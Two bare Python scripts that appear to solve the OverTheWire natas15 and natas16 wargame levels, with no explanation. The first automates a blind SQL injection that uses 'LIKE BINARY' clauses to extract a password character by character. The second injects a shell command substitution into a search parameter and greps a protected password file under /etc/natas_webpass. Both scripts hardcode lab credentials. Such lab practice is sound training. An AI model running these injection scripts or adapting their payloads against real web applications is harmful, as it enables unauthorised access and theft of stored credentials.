import requests

chars='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
password=""
target='http://natas15.natas.labs.overthewire.org/index.php?username=natas16"'
exist=""

for x in chars:
    print (target+'AND password LIKE BINARY "%'+x+'%" "')
    r = requests.get( target+'AND password LIKE BINARY "%'+x+'%" "', auth=('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'))
    response =r.text
    if("This user exists" in response):
        #print ("Found letter" ,x)
        exist+=x
print (exist)

for i in range (0,32):
        for char in exist:
                r = requests.get( target+'AND password LIKE BINARY "'+password+char+'%" "', auth=('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'))
                response =r.text
                if 'exists' in response:
                        password =password+char
                        print (password)


___________________________*********************************________________________________________________

import requests

char="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789"
output=""
target="http://natas16.natas.labs.overthewire.org/"
passwd=""

for i in range(0,32):
    for x in char:
        passwd +=x
        payload= ("?needle=$(grep+-E+^{}.*+/etc/natas_webpass/natas17)hello&submit=Search").format(output+x)
        print (payload)
        r= requests.get(target +payload, auth=('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'))
        response = r.text
        if("hellos" in response):
            pass
        else:
            output +=x
            print (output)
